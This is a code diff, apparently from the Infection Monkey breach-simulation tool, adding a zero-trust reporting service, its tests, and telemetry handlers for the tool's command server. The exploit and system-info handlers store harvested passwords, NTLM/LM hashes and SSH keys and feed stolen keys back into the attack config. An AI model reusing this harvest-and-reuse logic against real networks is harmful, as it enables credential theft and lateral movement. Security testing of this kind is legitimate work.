subnet_groups = get_config_network_segments_as_subnet_groups()
|
||||||
|
|
||||||
for subnet_group in subnet_groups:
|
for subnet_group in subnet_groups:
|
||||||
cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group)
|
cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group)
|
|
@ -1,7 +1,7 @@
|
||||||
import uuid
|
import uuid
|
||||||
|
|
||||||
from monkey_island.cc.models import Monkey
|
from monkey_island.cc.models import Monkey
|
||||||
from monkey_island.cc.services.pth_report import PTHReportService
|
from monkey_island.cc.services.reporting.pth_report import PTHReportService
|
||||||
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,285 @@
|
||||||
|
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
def save_example_findings():
|
||||||
|
# arrange
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
|
||||||
|
# devices unexecuted = 1
|
||||||
|
# people verify = 1
|
||||||
|
# networks verify = 1
|
||||||
|
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||||
|
# people verify = 2
|
||||||
|
# networks verify = 2
|
||||||
|
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||||
|
# data failed 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 2
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 3
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 4
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 5
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data verify 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||||
|
# data verify 2
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||||
|
# data passed 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
|
||||||
|
|
||||||
|
|
||||||
|
class TestZeroTrustService(IslandTestCase):
|
||||||
|
def test_get_pillars_grades(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = [
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 5,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 1,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "Data"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "People"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 2,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 4,
|
||||||
|
"pillar": "Networks"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 1,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 2,
|
||||||
|
STATUS_UNEXECUTED: 1,
|
||||||
|
"pillar": "Devices"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0,
|
||||||
|
"pillar": "Workloads"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 3,
|
||||||
|
"pillar": "Visibility & Analytics"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0,
|
||||||
|
"pillar": "Automation & Orchestration"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
result = ZeroTrustService.get_pillars_grades()
|
||||||
|
|
||||||
|
self.assertEquals(result, expected)
|
||||||
|
|
||||||
|
def test_get_principles_status(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
self.maxDiff = None
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: [],
|
||||||
|
DATA: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT],
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
DEVICES: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY],
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"status": STATUS_FAILED,
|
||||||
|
"test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY]
|
||||||
|
},
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
NETWORKS: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_SEGMENTATION],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
],
|
||||||
|
PEOPLE: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR],
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_VERIFY,
|
||||||
|
"test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
VISIBILITY_ANALYTICS: [
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES],
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"tests": [
|
||||||
|
{
|
||||||
|
"status": STATUS_UNEXECUTED,
|
||||||
|
"test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
],
|
||||||
|
WORKLOADS: []
|
||||||
|
}
|
||||||
|
|
||||||
|
result = ZeroTrustService.get_principles_status()
|
||||||
|
self.assertEquals(result, expected)
|
||||||
|
|
||||||
|
def test_get_pillars_to_statuses(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
self.clean_finding_db()
|
||||||
|
|
||||||
|
self.maxDiff = None
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||||
|
DEVICES: STATUS_UNEXECUTED,
|
||||||
|
NETWORKS: STATUS_UNEXECUTED,
|
||||||
|
PEOPLE: STATUS_UNEXECUTED,
|
||||||
|
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||||
|
WORKLOADS: STATUS_UNEXECUTED,
|
||||||
|
DATA: STATUS_UNEXECUTED
|
||||||
|
}
|
||||||
|
|
||||||
|
self.assertEquals(ZeroTrustService.get_pillars_to_statuses(), expected)
|
||||||
|
|
||||||
|
save_example_findings()
|
||||||
|
|
||||||
|
expected = {
|
||||||
|
AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED,
|
||||||
|
DEVICES: STATUS_FAILED,
|
||||||
|
NETWORKS: STATUS_VERIFY,
|
||||||
|
PEOPLE: STATUS_VERIFY,
|
||||||
|
VISIBILITY_ANALYTICS: STATUS_UNEXECUTED,
|
||||||
|
WORKLOADS: STATUS_UNEXECUTED,
|
||||||
|
DATA: STATUS_FAILED
|
||||||
|
}
|
||||||
|
|
||||||
|
self.assertEquals(ZeroTrustService.get_pillars_to_statuses(), expected)
|
|
@ -0,0 +1,150 @@
|
||||||
|
import json
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
|
||||||
|
|
||||||
|
class ZeroTrustService(object):
|
||||||
|
@staticmethod
|
||||||
|
def get_pillars_grades():
|
||||||
|
pillars_grades = []
|
||||||
|
for pillar in PILLARS:
|
||||||
|
pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar))
|
||||||
|
return pillars_grades
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_pillar_grade(pillar):
|
||||||
|
all_findings = Finding.objects()
|
||||||
|
pillar_grade = {
|
||||||
|
"pillar": pillar,
|
||||||
|
STATUS_FAILED: 0,
|
||||||
|
STATUS_VERIFY: 0,
|
||||||
|
STATUS_PASSED: 0,
|
||||||
|
STATUS_UNEXECUTED: 0
|
||||||
|
}
|
||||||
|
|
||||||
|
tests_of_this_pillar = PILLARS_TO_TESTS[pillar]
|
||||||
|
|
||||||
|
test_unexecuted = {}
|
||||||
|
for test in tests_of_this_pillar:
|
||||||
|
test_unexecuted[test] = True
|
||||||
|
|
||||||
|
for finding in all_findings:
|
||||||
|
test_unexecuted[finding.test] = False
|
||||||
|
test_info = TESTS_MAP[finding.test]
|
||||||
|
if pillar in test_info[PILLARS_KEY]:
|
||||||
|
pillar_grade[finding.status] += 1
|
||||||
|
|
||||||
|
pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in test_unexecuted.values() if condition)
|
||||||
|
|
||||||
|
return pillar_grade
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_principles_status():
|
||||||
|
all_principles_statuses = {}
|
||||||
|
|
||||||
|
# init with empty lists
|
||||||
|
for pillar in PILLARS:
|
||||||
|
all_principles_statuses[pillar] = []
|
||||||
|
|
||||||
|
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||||
|
for pillar in PRINCIPLES_TO_PILLARS[principle]:
|
||||||
|
all_principles_statuses[pillar].append(
|
||||||
|
{
|
||||||
|
"principle": PRINCIPLES[principle],
|
||||||
|
"tests": ZeroTrustService.__get_tests_status(principle_tests),
|
||||||
|
"status": ZeroTrustService.__get_principle_status(principle_tests)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
return all_principles_statuses
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_principle_status(principle_tests):
|
||||||
|
worst_status = STATUS_UNEXECUTED
|
||||||
|
all_statuses = set()
|
||||||
|
for test in principle_tests:
|
||||||
|
all_statuses |= set(Finding.objects(test=test).distinct("status"))
|
||||||
|
|
||||||
|
for status in all_statuses:
|
||||||
|
if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status):
|
||||||
|
worst_status = status
|
||||||
|
|
||||||
|
return worst_status
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_tests_status(principle_tests):
|
||||||
|
results = []
|
||||||
|
for test in principle_tests:
|
||||||
|
test_findings = Finding.objects(test=test)
|
||||||
|
results.append(
|
||||||
|
{
|
||||||
|
"test": TESTS_MAP[test][TEST_EXPLANATION_KEY],
|
||||||
|
"status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_lcd_worst_status_for_test(all_findings_for_test):
|
||||||
|
"""
|
||||||
|
:param all_findings_for_test: All findings of a specific test (get this using Finding.objects(test={A_TEST}))
|
||||||
|
:return: the "worst" (i.e. most severe) status out of the given findings.
|
||||||
|
lcd stands for lowest common denominator.
|
||||||
|
"""
|
||||||
|
current_worst_status = STATUS_UNEXECUTED
|
||||||
|
for finding in all_findings_for_test:
|
||||||
|
if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status):
|
||||||
|
current_worst_status = finding.status
|
||||||
|
|
||||||
|
return current_worst_status
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_all_findings():
|
||||||
|
all_findings = Finding.objects()
|
||||||
|
enriched_findings = [ZeroTrustService.__get_enriched_finding(f) for f in all_findings]
|
||||||
|
return enriched_findings
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_enriched_finding(finding):
|
||||||
|
test_info = TESTS_MAP[finding.test]
|
||||||
|
enriched_finding = {
|
||||||
|
"test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status],
|
||||||
|
"test_key": finding.test,
|
||||||
|
"pillars": test_info[PILLARS_KEY],
|
||||||
|
"status": finding.status,
|
||||||
|
"events": ZeroTrustService.__get_events_as_dict(finding.events)
|
||||||
|
}
|
||||||
|
return enriched_finding
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_events_as_dict(events):
|
||||||
|
return [json.loads(event.to_json()) for event in events]
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_statuses_to_pillars():
|
||||||
|
results = {
|
||||||
|
STATUS_FAILED: [],
|
||||||
|
STATUS_VERIFY: [],
|
||||||
|
STATUS_PASSED: [],
|
||||||
|
STATUS_UNEXECUTED: []
|
||||||
|
}
|
||||||
|
for pillar in PILLARS:
|
||||||
|
results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_pillars_to_statuses():
|
||||||
|
results = {}
|
||||||
|
for pillar in PILLARS:
|
||||||
|
results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def __get_status_of_single_pillar(pillar):
|
||||||
|
grade = ZeroTrustService.__get_pillar_grade(pillar)
|
||||||
|
for status in ORDERED_TEST_STATUSES:
|
||||||
|
if grade[status] > 0:
|
||||||
|
return status
|
||||||
|
return STATUS_UNEXECUTED
|
|
@ -0,0 +1,7 @@
|
||||||
|
# import all implemented hooks, for brevity of hooks.py file
|
||||||
|
from tunnel import process_tunnel_telemetry
|
||||||
|
from state import process_state_telemetry
|
||||||
|
from exploit import process_exploit_telemetry
|
||||||
|
from scan import process_scan_telemetry
|
||||||
|
from system_info import process_system_info_telemetry
|
||||||
|
from post_breach import process_post_breach_telemetry
|
|
@ -0,0 +1,58 @@
|
||||||
|
import copy
|
||||||
|
|
||||||
|
import dateutil
|
||||||
|
|
||||||
|
from monkey_island.cc.database import mongo
|
||||||
|
from monkey_island.cc.encryptor import encryptor
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.services.edge import EdgeService
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.machine_exploited import test_machine_exploited
|
||||||
|
|
||||||
|
|
||||||
|
def process_exploit_telemetry(telemetry_json):
|
||||||
|
encrypt_exploit_creds(telemetry_json)
|
||||||
|
edge = get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
||||||
|
update_edge_info_with_new_exploit(edge, telemetry_json)
|
||||||
|
update_node_credentials_from_successful_attempts(edge, telemetry_json)
|
||||||
|
|
||||||
|
test_machine_exploited(
|
||||||
|
current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']),
|
||||||
|
exploit_successful=telemetry_json['data']['result'],
|
||||||
|
exploiter=telemetry_json['data']['exploiter'],
|
||||||
|
target_ip=telemetry_json['data']['machine']['ip_addr'],
|
||||||
|
timestamp=telemetry_json['timestamp'])
|
||||||
|
|
||||||
|
|
||||||
|
def update_node_credentials_from_successful_attempts(edge, telemetry_json):
|
||||||
|
for attempt in telemetry_json['data']['attempts']:
|
||||||
|
if attempt['result']:
|
||||||
|
found_creds = {'user': attempt['user']}
|
||||||
|
for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
|
||||||
|
if len(attempt[field]) != 0:
|
||||||
|
found_creds[field] = attempt[field]
|
||||||
|
NodeService.add_credentials_to_node(edge['to'], found_creds)
|
||||||
|
|
||||||
|
|
||||||
|
def update_edge_info_with_new_exploit(edge, telemetry_json):
|
||||||
|
telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started'])
|
||||||
|
telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished'])
|
||||||
|
new_exploit = copy.deepcopy(telemetry_json['data'])
|
||||||
|
new_exploit.pop('machine')
|
||||||
|
new_exploit['timestamp'] = telemetry_json['timestamp']
|
||||||
|
mongo.db.edge.update(
|
||||||
|
{'_id': edge['_id']},
|
||||||
|
{'$push': {'exploits': new_exploit}}
|
||||||
|
)
|
||||||
|
if new_exploit['result']:
|
||||||
|
EdgeService.set_edge_exploited(edge)
|
||||||
|
|
||||||
|
|
||||||
|
def encrypt_exploit_creds(telemetry_json):
|
||||||
|
attempts = telemetry_json['data']['attempts']
|
||||||
|
for i in range(len(attempts)):
|
||||||
|
for field in ['password', 'lm_hash', 'ntlm_hash']:
|
||||||
|
credential = attempts[i][field]
|
||||||
|
if len(credential) > 0:
|
||||||
|
attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
|
|
@ -0,0 +1,27 @@
|
||||||
|
from monkey_island.cc.database import mongo
|
||||||
|
from common.data.post_breach_consts import *
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication
|
||||||
|
|
||||||
|
|
||||||
|
def process_communicate_as_new_user_telemetry(telemetry_json):
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
message = telemetry_json['data']['result'][0]
|
||||||
|
success = telemetry_json['data']['result'][1]
|
||||||
|
test_new_user_communication(current_monkey, success, message)
|
||||||
|
|
||||||
|
|
||||||
|
POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {
|
||||||
|
POST_BREACH_COMMUNICATE_AS_NEW_USER: process_communicate_as_new_user_telemetry,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def process_post_breach_telemetry(telemetry_json):
|
||||||
|
mongo.db.monkey.update(
|
||||||
|
{'guid': telemetry_json['monkey_guid']},
|
||||||
|
{'$push': {'pba_results': telemetry_json['data']}})
|
||||||
|
|
||||||
|
post_breach_action_name = telemetry_json["data"]["name"]
|
||||||
|
if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS:
|
||||||
|
POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json)
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from monkey_island.cc.services.telemetry.processing import *
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = \
|
||||||
|
{
|
||||||
|
'tunnel': process_tunnel_telemetry,
|
||||||
|
'state': process_state_telemetry,
|
||||||
|
'exploit': process_exploit_telemetry,
|
||||||
|
'scan': process_scan_telemetry,
|
||||||
|
'system_info': process_system_info_telemetry,
|
||||||
|
'post_breach': process_post_breach_telemetry,
|
||||||
|
# `lambda *args, **kwargs: None` is a no-op.
|
||||||
|
'trace': lambda *args, **kwargs: None,
|
||||||
|
'attack': lambda *args, **kwargs: None,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def process_telemetry(telemetry_json):
|
||||||
|
try:
|
||||||
|
telem_category = telemetry_json.get('telem_category')
|
||||||
|
if telem_category in TELEMETRY_CATEGORY_TO_PROCESSING_FUNC:
|
||||||
|
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
|
||||||
|
else:
|
||||||
|
logger.info('Got unknown type of telemetry: %s' % telem_category)
|
||||||
|
except Exception as ex:
|
||||||
|
logger.error("Exception caught while processing telemetry. Info: {}".format(ex.message), exc_info=True)
|
|
@ -0,0 +1,44 @@
|
||||||
|
import copy
|
||||||
|
|
||||||
|
from monkey_island.cc.database import mongo
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.data_endpoints import test_open_data_endpoints
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import test_segmentation_violation
|
||||||
|
|
||||||
|
|
||||||
|
def process_scan_telemetry(telemetry_json):
|
||||||
|
update_edges_and_nodes_based_on_scan_telemetry(telemetry_json)
|
||||||
|
test_open_data_endpoints(telemetry_json)
|
||||||
|
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
target_ip = telemetry_json['data']['machine']['ip_addr']
|
||||||
|
test_segmentation_violation(current_monkey, target_ip)
|
||||||
|
|
||||||
|
|
||||||
|
def update_edges_and_nodes_based_on_scan_telemetry(telemetry_json):
|
||||||
|
edge = get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
||||||
|
data = copy.deepcopy(telemetry_json['data']['machine'])
|
||||||
|
ip_address = data.pop("ip_addr")
|
||||||
|
domain_name = data.pop("domain_name")
|
||||||
|
new_scan = \
|
||||||
|
{
|
||||||
|
"timestamp": telemetry_json["timestamp"],
|
||||||
|
"data": data
|
||||||
|
}
|
||||||
|
mongo.db.edge.update(
|
||||||
|
{"_id": edge["_id"]},
|
||||||
|
{"$push": {"scans": new_scan},
|
||||||
|
"$set": {"ip_address": ip_address, 'domain_name': domain_name}}
|
||||||
|
)
|
||||||
|
node = mongo.db.node.find_one({"_id": edge["to"]})
|
||||||
|
if node is not None:
|
||||||
|
scan_os = new_scan["data"]["os"]
|
||||||
|
if "type" in scan_os:
|
||||||
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
|
{"$set": {"os.type": scan_os["type"]}},
|
||||||
|
upsert=False)
|
||||||
|
if "version" in scan_os:
|
||||||
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
|
{"$set": {"os.version": scan_os["version"]}},
|
||||||
|
upsert=False)
|
|
@ -0,0 +1,17 @@
|
||||||
|
from monkey_island.cc.models import Monkey
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.segmentation import \
|
||||||
|
test_passed_findings_for_unreached_segments
|
||||||
|
|
||||||
|
|
||||||
|
def process_state_telemetry(telemetry_json):
|
||||||
|
monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
NodeService.add_communication_info(monkey, telemetry_json['command_control_channel'])
|
||||||
|
if telemetry_json['data']['done']:
|
||||||
|
NodeService.set_monkey_dead(monkey, True)
|
||||||
|
else:
|
||||||
|
NodeService.set_monkey_dead(monkey, False)
|
||||||
|
|
||||||
|
if telemetry_json['data']['done']:
|
||||||
|
current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
|
test_passed_findings_for_unreached_segments(current_monkey)
|
|
@ -0,0 +1,99 @@
|
||||||
|
from monkey_island.cc.database import mongo
|
||||||
|
from monkey_island.cc.services import mimikatz_utils
|
||||||
|
from monkey_island.cc.services.node import NodeService
|
||||||
|
from monkey_island.cc.services.config import ConfigService
|
||||||
|
from monkey_island.cc.services.telemetry.zero_trust_tests.antivirus_existence import test_antivirus_existence
|
||||||
|
from monkey_island.cc.services.wmi_handler import WMIHandler
|
||||||
|
from monkey_island.cc.encryptor import encryptor
|
||||||
|
|
||||||
|
|
||||||
|
def process_system_info_telemetry(telemetry_json):
|
||||||
|
process_ssh_info(telemetry_json)
|
||||||
|
process_credential_info(telemetry_json)
|
||||||
|
process_mimikatz_and_wmi_info(telemetry_json)
|
||||||
|
process_aws_data(telemetry_json)
|
||||||
|
test_antivirus_existence(telemetry_json)
|
||||||
|
|
||||||
|
|
||||||
|
def process_ssh_info(telemetry_json):
|
||||||
|
if 'ssh_info' in telemetry_json['data']:
|
||||||
|
ssh_info = telemetry_json['data']['ssh_info']
|
||||||
|
encrypt_system_info_ssh_keys(ssh_info)
|
||||||
|
if telemetry_json['data']['network_info']['networks']:
|
||||||
|
# We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
|
||||||
|
add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
|
||||||
|
add_system_info_ssh_keys_to_config(ssh_info)
|
||||||
|
|
||||||
